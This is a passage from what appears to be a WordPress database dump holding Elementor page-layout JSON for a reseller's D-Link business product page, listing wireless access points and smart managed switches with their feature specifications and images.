]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7438,3391,'_elementor_version','2.5.14'),(7439,3391,'_elementor_edit_mode','builder'),(7442,3392,'_wp_page_template','template-fullwidth.php'),(7443,3392,'_elementor_template_type','post'),(7444,3392,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"290\",\"right\":\"290\",\"bottom\":\"290\",\"left\":\"290\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"68\",\"right\":\"68\",\"bottom\":\"68\",\"left\":\"68\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"medium\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">Enjoy High-performance Wireless Connectivity<\\/h4><p style=\\\"text-align: left;\\\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><h4 style=\\\"text-align: center;\\\">MU-MIMO with Beamforming<\\/h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><h4 style=\\\"text-align: center;\\\">Multiple Operational Modes<\\/h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six 